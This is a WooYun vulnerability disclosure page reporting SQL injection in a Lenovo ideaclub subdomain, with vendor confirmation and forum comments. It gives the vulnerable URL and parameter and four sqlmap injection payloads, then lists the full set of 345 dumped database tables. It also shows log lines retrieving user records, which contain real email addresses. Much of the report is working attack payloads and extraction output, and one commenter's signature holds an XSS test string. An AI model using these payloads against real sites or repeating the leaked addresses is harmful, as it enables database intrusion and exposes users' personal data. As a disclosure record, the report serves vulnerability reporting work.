当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035312

漏洞标题:联想安全问题八某分站SQL注射一枚(188597用户数据面临泄漏危机)

相关厂商:联想

漏洞作者: VIP

提交时间:2013-08-26 15:37

修复时间:2013-10-10 15:37

公开时间:2013-10-10 15:37

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-26: 细节已通知厂商并且等待厂商处理中
2013-08-27: 厂商已经确认,细节仅向厂商公开
2013-09-06: 细节向核心白帽子及相关领域专家公开
2013-09-16: 细节向普通白帽子公开
2013-09-26: 细节向实习白帽子公开
2013-10-10: 细节向公众公开

简要描述:

今天联想终于要发礼物了,于是又有动力挖洞了,于是又挖到一个注射!

详细说明:

注射点:

http://ideaclub.lenovo.com.cn/club/index.php?m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b


参数item_id存在注射
这次很幸运 是有返回的注射哦!!!

漏洞证明:

---
Place: GET
Parameter: item_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b'
 AND 5080=5080 AND 'HEIH'='HEIH
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b'
 AND (SELECT 8983 FROM(SELECT COUNT(*),CONCAT(0x7162737971,(SELECT (CASE WHEN (8
983=8983) THEN 1 ELSE 0 END)),0x716f707271,FLOOR(RAND(0)*2))x FROM INFORMATION_S
CHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YRCb'='YRCb
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b'
 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162737971,0x48416f6e704e75495566
,0x716f707271),NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b'
 AND SLEEP(5) AND 'hKGD'='hKGD
---


web application technology: Nginx
back-end DBMS: MySQL 5.0


345个表

Database: ideaclub2
[345 tables]
+------------------------------------+
| c_activity_member                  |
| c_asset_tbl                        |
| c_asset_tbl_content_tbl            |
| c_comment                          |
| c_config                           |
| c_content_tbl                      |
| c_content_tbl_download_tbl         |
| c_content_tbl_system_menu          |
| c_content_tbl_template_tbl         |
| c_dictionary_map                   |
| c_dictionary_sort                  |
| c_download_tbl                     |
| c_evil_ip                          |
| c_experience_store                 |
| c_expstore                         |
| c_goods                            |
| c_goods_convert                    |
| c_goods_img                        |
| c_item_tbl                         |
| c_item_tbl_download_tbl            |
| c_keywords                         |
| c_m_ad                             |
| c_m_campaisn                       |
| c_m_media                          |
| c_m_tracker                        |
| c_member                           |
| c_member_action                    |
| c_member_action_score              |
| c_member_attention                 |
| c_member_bind                      |
| c_member_bind_douban               |
| c_member_bind_qq                   |
| c_member_bind_renren               |
| c_member_bind_sina                 |
| c_member_login_count               |
| c_member_profile                   |
| c_member_score                     |
| c_member_verifycode                |
| c_member_visit                     |
| c_reg_user                         |
| c_store_activity_comment           |
| c_store_products                   |
| c_system_function                  |
| c_system_menu                      |
| c_system_menu_function             |
| c_system_menu_template_tbl         |
| c_system_role                      |
| c_system_role_function             |
| c_system_user                      |
| c_system_user_role                 |
| c_template_tbl                     |
| f_common_admincp_cmenu             |
| f_common_admincp_group             |
| f_common_admincp_member            |
| f_common_admincp_perm              |
| f_common_admincp_session           |
| f_common_admingroup                |
| f_common_adminnote                 |
| f_common_advertisement             |
| f_common_advertisement_custom      |
| f_common_banned                    |
| f_common_block                     |
| f_common_block_favorite            |
| f_common_block_item                |
| f_common_block_item_data           |
| f_common_block_permission          |
| f_common_block_pic                 |
| f_common_block_style               |
| f_common_block_xml                 |
| f_common_cache                     |
| f_common_card                      |
| f_common_card_log                  |
| f_common_card_type                 |
| f_common_connect_guest             |
| f_common_credit_log                |
| f_common_credit_rule               |
| f_common_credit_rule_log           |
| f_common_credit_rule_log_field     |
| f_common_cron                      |
| f_common_devicetoken               |
| f_common_district                  |
| f_common_diy_data                  |
| f_common_domain                    |
| f_common_failedlogin               |
| f_common_friendlink                |
| f_common_grouppm                   |
| f_common_invite                    |
| f_common_magic                     |
| f_common_magiclog                  |
| f_common_mailcron                  |
| f_common_mailqueue                 |
| f_common_member                    |
| f_common_member_action_log         |
| f_common_member_connect            |
| f_common_member_count              |
| f_common_member_crime              |
| f_common_member_field_forum        |
| f_common_member_field_home         |
| f_common_member_fivecube           |
| f_common_member_grouppm            |
| f_common_member_log                |
| f_common_member_lottery            |
| f_common_member_magic              |
| f_common_member_medal              |
| f_common_member_profile            |
| f_common_member_profile_setting    |
| f_common_member_profile_update_log |
| f_common_member_security           |
| f_common_member_stat_field         |
| f_common_member_status             |
| f_common_member_validate           |
| f_common_member_verify             |
| f_common_member_verify_info        |
| f_common_myapp                     |
| f_common_myinvite                  |
| f_common_mytask                    |
| f_common_nav                       |
| f_common_onlinetime                |
| f_common_patch                     |
| f_common_plugin                    |
| f_common_plugin_reminder           |
| f_common_pluginvar                 |
| f_common_process                   |
| f_common_regip                     |
| f_common_relatedlink               |
| f_common_report                    |
| f_common_searchindex               |
| f_common_secquestion               |
| f_common_session                   |
| f_common_setting                   |
| f_common_smiley                    |
| f_common_sphinxcounter             |
| f_common_stat                      |
| f_common_statuser                  |
| f_common_style                     |
| f_common_stylevar                  |
| f_common_syscache                  |
| f_common_tag                       |
| f_common_tagitem                   |
| f_common_task                      |
| f_common_taskvar                   |
| f_common_template                  |
| f_common_template_block            |
| f_common_template_permission       |
| f_common_uin_black                 |
| f_common_usergroup                 |
| f_common_usergroup_field           |
| f_common_word                      |
| f_common_word_type                 |
| f_connect_disktask                 |
| f_connect_feedlog                  |
| f_connect_memberbindlog            |
| f_connect_postfeedlog              |
| f_connect_tthreadlog               |
| f_forum_access                     |
| f_forum_activity                   |
| f_forum_activityapply              |
| f_forum_announcement               |
| f_forum_attachment                 |
| f_forum_attachment_0               |
| f_forum_attachment_1               |
| f_forum_attachment_2               |
| f_forum_attachment_3               |
| f_forum_attachment_4               |
| f_forum_attachment_5               |
| f_forum_attachment_6               |
| f_forum_attachment_7               |
| f_forum_attachment_8               |
| f_forum_attachment_9               |
| f_forum_attachment_exif            |
| f_forum_attachment_unused          |
| f_forum_attachtype                 |
| f_forum_bbcode                     |
| f_forum_collection                 |
| f_forum_collectioncomment          |
| f_forum_collectionfollow           |
| f_forum_collectioninvite           |
| f_forum_collectionrelated          |
| f_forum_collectionteamworker       |
| f_forum_collectionthread           |
| f_forum_creditslog                 |
| f_forum_debate                     |
| f_forum_debatepost                 |
| f_forum_faq                        |
| f_forum_forum                      |
| f_forum_forum_threadtable          |
| f_forum_forumfield                 |
| f_forum_forumrecommend             |
| f_forum_groupcreditslog            |
| f_forum_groupfield                 |
| f_forum_groupinvite                |
| f_forum_grouplevel                 |
| f_forum_groupuser                  |
| f_forum_imagetype                  |
| f_forum_medal                      |
| f_forum_medallog                   |
| f_forum_memberrecommend            |
| f_forum_moderator                  |
| f_forum_modwork                    |
| f_forum_onlinelist                 |
| f_forum_order                      |
| f_forum_poll                       |
| f_forum_polloption                 |
| f_forum_pollvoter                  |
| f_forum_post                       |
| f_forum_post_location              |
| f_forum_post_moderate              |
| f_forum_post_tableid               |
| f_forum_postcache                  |
| f_forum_postcomment                |
| f_forum_postlog                    |
| f_forum_poststick                  |
| f_forum_promotion                  |
| f_forum_ratelog                    |
| f_forum_relatedthread              |
| f_forum_replycredit                |
| f_forum_rsscache                   |
| f_forum_spacecache                 |
| f_forum_statlog                    |
| f_forum_thread                     |
| f_forum_thread_moderate            |
| f_forum_threadaddviews             |
| f_forum_threadclass                |
| f_forum_threadclosed               |
| f_forum_threaddisablepos           |
| f_forum_threadimage                |
| f_forum_threadlog                  |
| f_forum_threadmod                  |
| f_forum_threadpartake              |
| f_forum_threadpreview              |
| f_forum_threadrush                 |
| f_forum_threadtype                 |
| f_forum_trade                      |
| f_forum_tradecomment               |
| f_forum_tradelog                   |
| f_forum_typeoption                 |
| f_forum_typeoptionvar              |
| f_forum_typevar                    |
| f_forum_warning                    |
| f_home_album                       |
| f_home_album_category              |
| f_home_appcreditlog                |
| f_home_blacklist                   |
| f_home_blog                        |
| f_home_blog_category               |
| f_home_blog_moderate               |
| f_home_blogfield                   |
| f_home_class                       |
| f_home_click                       |
| f_home_clickuser                   |
| f_home_comment                     |
| f_home_comment_moderate            |
| f_home_docomment                   |
| f_home_doing                       |
| f_home_doing_moderate              |
| f_home_favorite                    |
| f_home_feed                        |
| f_home_feed_app                    |
| f_home_follow                      |
| f_home_follow_feed                 |
| f_home_follow_feed_archiver        |
| f_home_friend                      |
| f_home_friend_request              |
| f_home_friendlog                   |
| f_home_notification                |
| f_home_pic                         |
| f_home_pic_moderate                |
| f_home_picfield                    |
| f_home_poke                        |
| f_home_pokearchive                 |
| f_home_share                       |
| f_home_share_moderate              |
| f_home_show                        |
| f_home_specialuser                 |
| f_home_userapp                     |
| f_home_userappfield                |
| f_home_visitor                     |
| f_infbox                           |
| f_infbox_setting                   |
| f_mobile_setting                   |
| f_plugin_wodexunzhang              |
| f_plugin_wodexunzhang_ershou       |
| f_plugin_wodexunzhang_fenlei       |
| f_plugin_wodexunzhang_kucun        |
| f_plugin_wodexunzhang_log          |
| f_plugin_wodexunzhang_user         |
| f_portal_article_content           |
| f_portal_article_count             |
| f_portal_article_moderate          |
| f_portal_article_related           |
| f_portal_article_title             |
| f_portal_article_trash             |
| f_portal_attachment                |
| f_portal_category                  |
| f_portal_category_permission       |
| f_portal_comment                   |
| f_portal_comment_moderate          |
| f_portal_rsscache                  |
| f_portal_topic                     |
| f_portal_topic_pic                 |
| f_security_evilpost                |
| f_security_eviluser                |
| f_security_failedlog               |
| f_ucenter_admins                   |
| f_ucenter_applications             |
| f_ucenter_badwords                 |
| f_ucenter_domains                  |
| f_ucenter_failedlogins             |
| f_ucenter_feeds                    |
| f_ucenter_friends                  |
| f_ucenter_mailqueue                |
| f_ucenter_memberfields             |
| f_ucenter_members                  |
| f_ucenter_members_csv              |
| f_ucenter_mergemembers             |
| f_ucenter_newpm                    |
| f_ucenter_notelist                 |
| f_ucenter_pm_indexes               |
| f_ucenter_pm_lists                 |
| f_ucenter_pm_members               |
| f_ucenter_pm_messages_0            |
| f_ucenter_pm_messages_1            |
| f_ucenter_pm_messages_2            |
| f_ucenter_pm_messages_3            |
| f_ucenter_pm_messages_4            |
| f_ucenter_pm_messages_5            |
| f_ucenter_pm_messages_6            |
| f_ucenter_pm_messages_7            |
| f_ucenter_pm_messages_8            |
| f_ucenter_pm_messages_9            |
| f_ucenter_protectedmembers         |
| f_ucenter_settings                 |
| f_ucenter_sqlcache                 |
| f_ucenter_tags                     |
| f_ucenter_vars                     |
| ld_member_prize                    |
| ld_prize_config                    |
| ld_prize_log                       |
| ld_prize_setting                   |
| ld_prize_test                      |
| ld_receive_address                 |
| temp_common_member                 |
| temp_member                        |
| temp_un                            |
| tmp_id                             |
+------------------------------------+


188596条用户数据

15:11:37] [INFO] the SQL query used returns 188597 entries
[15:11:37] [INFO] retrieved: "1970-01-01 08:00:00","2","terry@sina.com.cn"," ...
[15:11:38] [INFO] retrieved: "1970-01-01 08:00:00","3","jiazhou@bluefocus.com...
[15:11:38] [INFO] retrieved: "1970-01-01 08:00:00","4","iori999@163.com"," ",...
[15:11:39] [INFO] retrieved: "1970-01-01 08:00:00","5","596610835@qq.com"," "...
[15:11:40] [INFO] retrieved: "1970-01-01 08:00:00","6","zhqchy@yahoo.vom"," "...
[15:11:40] [INFO] retrieved: "1970-01-01 08:00:00","7","yangyang@sina.com"," ...
[15:11:40] [INFO] retrieved: "1970-01-01 08:00:00","188","32768796@qq.com"," ...

修复方案:

过滤吧

版权声明:转载请注明来源 VIP@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-08-27 13:54

厂商回复:

感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞

最新状态:

暂无

漏洞评价:

评论

  1. 2013-08-26 15:40 | PgHook ( 普通白帽子 | Rank:964 漏洞数:115 | ...........................................)

    我靠,你是想去联想上班了吧!哈哈!

  2. 2013-08-26 15:45 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    WooYun: 联想问题一之某内网重要服务器getshell导致疑似所有用户资料和内部绝密信息泄露 我走了小厂商?前台显示无所谓了 首页最新确认也没了。。。

  3. 2013-08-26 15:46 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @淡漠天空 这啥时候过的?给你解决了

  4. 2013-08-26 15:50 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    @疯狗 tks 无意瞅了眼联想 然后@了Finger。。。。

  5. 2013-08-26 17:02 | iiiiiiiii ( 普通白帽子 | Rank:680 漏洞数:89 | )

    联想最近很火啊

  6. 2013-08-26 18:36 | 小痞子 ( 普通白帽子 | Rank:106 漏洞数:21 | <xss>alert("a")</xss>¥&@&……dssKhwjcw...)

    哎 啥都不想说了~~挖煤去